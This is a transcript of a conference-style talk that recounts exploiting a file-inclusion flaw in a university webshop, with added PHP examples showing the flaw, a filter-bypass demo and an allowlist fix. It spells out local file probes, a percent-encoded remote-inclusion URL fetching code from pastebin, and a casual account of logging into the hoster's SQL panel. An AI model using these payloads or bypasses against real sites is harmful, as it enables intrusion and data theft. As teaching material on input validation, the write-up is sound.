Oops! How I accidentally hacked the University's Merchandising Shop - PowerPoint PPT Presentation


SLIDE 1

Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 1

Oops!

How I accidentally hacked the University's Merchandising Shop

SLIDE 2

About UniBwM

  • University of the German Federal Armed Forces, Munich
  • ~3700 students in 2011
  • Corporate Design
  • Sells shirts and stuff via a student-driven webshop

UniBwM Press Archive

SLIDE 3

About Me

  • Student of Computer Aided Engineering
  • Assistant at Network Security department
  • find them holes!
  • www.danrl.de

SLIDE 4

SLIDE 5

static vs. dynamic

SLIDE 6

http://www.uni-fashion.de/index.php?inhalt=artikel.php&...

SLIDE 7

A closer look

http://www.uni-fashion.de/index.php?inhalt=artikel.php&...

That's a filename!

The value of the inhalt ("content") parameter is a filename, and that filename is used to load the dynamic content. Unfortunately, that's a bad kind of brainchild :(

SLIDE 8

Behind the scenes

Visitor -> Webserver -> index.php -> artikel.php (index.php loads whatever file the request names)

We call this technique File Inclusion.
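The following is an added example, not the shop's code (the talk never shows it): it reconstructs the include pattern the slides describe, classifies what include() would do with each of the probes used in the talk, and sets the allowlist form beside it. The page names other than artikel.php are assumed.

```php
<?php
// Added example: not the uni-fashion.de code. The "vulnerable" branch is the
// pattern the talk describes (index.php?inhalt=<filename>); the "hardened"
// branch is the allowlist form. Page names other than artikel.php are assumed.
declare(strict_types=1);

// --- The vulnerable pattern: the request parameter is the include path. ---
// include() accepts any path and, because PHP's stream wrappers apply to it,
// also URLs such as http://... (executed only if allow_url_include=On).
function vulnerable_index(string $inhalt): void
{
    include $inhalt;   // Local or Remote File Inclusion, depending on $inhalt
}

// Classify what include() would do with a given value, without running it.
function include_target_kind(string $inhalt): string
{
    if (preg_match('~^([a-z][a-z0-9+.-]*)://~i', $inhalt, $m)) {
        $scheme = strtolower($m[1]);
        if (in_array($scheme, ['http', 'https', 'ftp', 'ftps'], true)) {
            return 'remote URL (executed only with allow_url_include=On)';
        }
        return "php stream wrapper '$scheme://'";   // php://, data://, phar://, ...
    }
    if (strpos($inhalt, "\0") !== false) {
        return 'null byte (rejected by PHP since 5.3.4)';
    }
    if ($inhalt !== '' && $inhalt[0] === '/') {
        return 'absolute local path';
    }
    if (preg_match('~(^|/)\.\.(/|$)~', $inhalt)) {
        return 'relative path with directory traversal';
    }
    return 'relative local file';
}

// --- The hardened pattern: the parameter selects a key, never a path. ---
const PAGES = [                       // assumed page names, for illustration
    'artikel'   => 'artikel.php',
    'warenkorb' => 'warenkorb.php',
    'impressum' => 'impressum.php',
];

function resolve_page(string $key): ?string
{
    // Unknown keys map to null (a 404); nothing derived from the request
    // ever reaches include() as a path.
    return PAGES[$key] ?? null;
}

function hardened_index(array $get): void
{
    $file = resolve_page($get['inhalt'] ?? 'artikel');
    if ($file === null) {
        http_response_code(404);
        return;
    }
    include __DIR__ . '/pages/' . $file;
}

// Demo: the probes from the talk, plus a php:// wrapper for comparison.
if (PHP_SAPI === 'cli') {
    $probes = [
        'artikel.php',
        '/etc/passwd',
        '/root/.bash_history',
        '../../etc/passwd',
        'http://pastebin.com/raw.php?i=XqcNB6hz',
        'php://filter/convert.base64-encode/resource=index.php',
    ];
    foreach ($probes as $p) {
        printf("%-55s %s\n", $p, include_target_kind($p));
        printf("%-55s allowlist -> %s\n", '', resolve_page($p) ?? 'rejected');
    }
}
```

Run it with php on the command line. The talk does not say why the local probes (/etc/passwd and friends) failed on the real shop, so the classifier only tells you what include() is being asked to do, not what the target's PHP configuration allowed.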

SLIDE 9

Escalating

  • Let's try some other filenames
  • /etc/passwd
  • /var/log/messages
  • /root/.bash_history

SLIDE 10

No success!

(that's good from the security point of view)

SLIDE 11

Remote File Inclusion

Attacker -> Webserver -> index.php -> evil.php on the Evil Webserver (instead of artikel.php)

Let's create some harmless code to include!

SLIDE 12

SLIDE 13

Raw Code

SLIDE 14

Fail!

No success!

(that's good from the security point of view)

SLIDE 15

Difference makes a difference

But wait... don't these error messages look different? What does that mean?

Website Error (for the local filenames) vs. Webserver Error (for the remote URL)

SLIDE 16

Questions

  • Why did the Remote File Inclusion attack fail?
  • Why do local filenames generate different errors than remote URLs?

Request -> Webserver -> .htaccess ("Rules", "Filtering") -> index.php

SLIDE 17

No guts, no glory!

=http is filtered

SLIDE 18

Fail!

=http is filtered

SLIDE 19

Encoding issues

  • In a URL, any character can be written as %<HEX-ASCII>
  • Same URL, different writing:
  • http://uni-fashion.de/index.php?a=bc
  • http://uni-fashion.de/index.php?a=%62%63
  • Will the filter catch this one?
  • http://uni-fashion.de/index.php?inhalt=%68ttp://pastebin.com/raw.php?i=XqcNB6hz

(the h of http written as %<HEX-ASCII>, i.e. %68)
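An added example for the filter bypass above, not the shop's .htaccess (the talk does not show it). It assumes the rule was a substring match on the raw, still percent-encoded query string, as a mod_rewrite RewriteCond on %{QUERY_STRING} is, while PHP decodes that string afterwards when it builds $_GET. The allowed page names are assumed. It also carries the fix the lessons-learned slide asks for: an allowlist compared against the decoded value rather than a filter in front of the code.

```php
<?php
// Added example: the talk shows only that "=http" was filtered by .htaccess
// and that "=%68ttp" got through. Assumption: the rule matched the raw,
// still percent-encoded query string, while PHP decoded it afterwards.
declare(strict_types=1);

// The kind of check the talk ran into: a substring test on the raw query string.
function raw_query_blocked(string $raw_query): bool
{
    return stripos($raw_query, '=http') !== false;
}

// What index.php sees: PHP percent-decodes the query string into $_GET.
function php_get(string $raw_query): array
{
    parse_str($raw_query, $get);
    return $get;
}

// A "better" blacklist: the same idea applied after decoding. It catches
// %68ttp, but it is still a blacklist and misses anything it did not foresee.
function decoded_query_blocked(string $raw_query): bool
{
    $inhalt = php_get($raw_query)['inhalt'] ?? '';
    return preg_match('~^[a-z][a-z0-9+.-]*://~i', $inhalt) === 1;
}

// The actual fix: an allowlist compared against the decoded value.
const ALLOWED_PAGES = ['artikel.php', 'warenkorb.php', 'impressum.php']; // assumed names

function allowlist_accepts(string $raw_query): bool
{
    $inhalt = php_get($raw_query)['inhalt'] ?? '';
    return in_array($inhalt, ALLOWED_PAGES, true);
}

function evaluate(string $raw_query): array
{
    return [
        'php_sees'          => php_get($raw_query)['inhalt'] ?? '',
        'raw_filter_blocks' => raw_query_blocked($raw_query),
        'decoded_blocks'    => decoded_query_blocked($raw_query),
        'allowlist_accepts' => allowlist_accepts($raw_query),
    ];
}

if (PHP_SAPI === 'cli') {
    $payload = '://pastebin.com/raw.php?i=XqcNB6hz';
    $queries = [
        'inhalt=artikel.php',
        'inhalt=http' . $payload,     // blocked by the raw filter (slide 18)
        'inhalt=%68ttp' . $payload,   // slips past it; PHP still sees http://... (slides 19-20)
        'inhalt=../../etc/passwd',    // no scheme at all: neither blacklist reacts
    ];
    foreach ($queries as $q) {
        printf("%-50s\n  -> %s\n", $q, json_encode(evaluate($q)));
    }
}
```

The third query is the one from the slide: the raw filter never sees the string "=http", yet parse_str() hands index.php exactly http://pastebin.com/raw.php?i=XqcNB6hz. The fourth shows why moving the blacklist behind the decoder is not enough either; only the allowlist rejects both.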

SLIDE 20

Bazinga!

SLIDE 21

Can you keep a secret?

  • New code
  • New URL
  • Same game

WTF?

SLIDE 22

A few no-brainers

  • Look up the hoster in WHOIS
  • Find the URL of the hoster's SQL admin panel
  • Log in with the correct password :)

SLIDE 23

SLIDE 24

My work here is done...

Might be useful :)

SLIDE 25

Lessons learned

  • Always validate every piece of user-supplied input!
  • Seriously, do it!
  • Do not patch bad code with filters in front of it; repair the code itself!
  • Never trust encoding! (check the decoded value, not the raw request)
  • Use SSL for your SQL admin panel :)
  • I can haz a free T-Shirt now?

SLIDE 26

Thanks!

Questions?